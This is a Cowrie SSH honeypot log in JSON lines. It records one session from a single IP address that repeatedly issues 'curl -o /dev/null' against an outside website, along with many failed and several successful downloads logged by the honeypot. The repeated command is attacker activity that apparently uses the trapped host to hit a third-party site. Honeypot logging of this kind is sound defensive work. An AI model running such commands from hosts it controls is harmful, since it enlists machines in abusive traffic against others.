{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.784552Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.806871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.808016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.844656Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.847596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.848560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.887512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.888376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.892314Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.929849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.931034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.937821Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.970214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.970940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.015216Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.019003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.020329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.058069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.059962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.096874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.097780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.111451Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.136208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.137214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.163852Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.174638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.175856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.200500Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.213084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.214096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.240920Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.251287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.252189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.290287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.291291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.317326Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.333114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.333979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.366000Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.371061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.372530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.399343Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.420250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.421276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.458876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.459821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.466634Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.496609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.497464Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.535257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.536307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.565868Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.573283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.575268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.604470Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.643824Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.645810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.646464Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.683758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.684729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.687386Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.702533Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.705152Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.722674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.723528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.731803Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.762221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.763139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.766015Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.768515Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.771497Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.773667Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.805318Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.806925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.809578Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.845518Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.861459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.862395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.884593Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.901564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.902398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.935197Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.939227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.940507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:12.977320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:12.978326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.015334Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.017171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.017886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.055011Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.057073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.057787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.094580Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.096475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.097369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.134890Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.137059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.137945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.175197Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.177556Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.178435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.216038Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.220419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.221153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.273252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.274115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.310862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.311727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.344565Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.347918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.348659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.387650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.388585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:13.401505Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:13.425218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
